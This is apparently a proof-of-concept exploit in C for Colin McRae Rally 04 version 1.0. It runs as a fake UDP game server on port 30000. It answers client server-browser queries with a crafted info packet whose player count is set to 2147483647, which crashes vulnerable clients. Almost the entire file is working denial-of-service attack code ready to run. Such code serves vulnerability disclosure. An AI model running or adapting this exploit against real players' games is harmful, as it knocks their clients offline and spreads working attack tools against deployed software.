/*

by Luigi Auriemma

UNIX & WIN VERSION
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif




#define VER         "0.1"
#define BUFFSZ      2048
#define PORT        30000
#define PLAYBUG     "2147483647"        /* THE BUG IS HERE! */
#define PING        "\x05\x00\x00\x00\x00\x00"
#define GAMEVER     "1.0"               /* Retail game */
//#define GAMEVER     "Lan Demo 1.0"    /* demo game */



void std_err(void);



int main(int argc, char *argv[]) {
    int     sd,
            len,
            on = 1,
            psz;
    struct  sockaddr_in peer;
    u_char  *buff,
            *pck,
            pcklan[] =
                "\x00\x00\x00\x00\x00"
                "hostname\0"    "You crash\0"
                "gamever\0"     GAMEVER"\0"
                "hostport\0"    "30000\0"
                "password\0"    "0\0"
                "gametype\0"    "Stages, ESP P1\0"
                "gamemode\0"    "openwaiting\0"
                "numplayers\0"  PLAYBUG"\0"
                "maxplayers\0"  "4\0"
                "rally\0"       "0\0"
                "stages\0"      "100\0"
                "damage\0"      "0\0"
                "ranking\0"     "0\0"
                "cartype\0"     "0\0",
            pckinternet[] =
                "\x00\x00\x00\x00\x00"
                "You crash\0"
                GAMEVER"\0"
                "0\0"
                "Stages, ESP P1\0"
                "openwaiting\0"
                PLAYBUG"\0"
                "4\0";


    setbuf(stdout, NULL);

    fputs("\n"
        "Colin McRae Rally 04 1.0 broadcast client crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    printf("\n"
        "The game version that will be used is \"%s\"\n"
        "  Only the clients with the same version you use here will be vulnerable,\n"
        "  modify the source code (GAMEVER) to change this version\n"
        "\n"
        "Binding UDP port %u\n",
        GAMEVER, PORT);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sd, (struct sockaddr *)&peer, psz)
      < 0) std_err();

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    fputs("\nClients:\n", stdout);
    while(1) {
        len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
        if(len < 0) std_err();

        if(buff[2]) {
            printf("PING       %s:%hu\n",
                inet_ntoa(peer.sin_addr), htons(peer.sin_port));

            if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, psz)
              < 0) std_err();
            continue;
        }

        if(len == 10) {
            fputs("LAN        ", stdout);
            pck = pcklan;
            len = sizeof(pcklan) - 1;
        } else {
            fputs("INTERNET   ", stdout);
            pck = pckinternet;
            len = sizeof(pckinternet) - 1;
        }

        printf("%s:%hu\n",
            inet_ntoa(peer.sin_addr), htons(peer.sin_port));

        memcpy(pck, buff + 2, 5);
        if(sendto(sd, pck, len, 0, (struct sockaddr *)&peer, psz)
          < 0) std_err();
    }

    close(sd);
    return(0);
}





#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


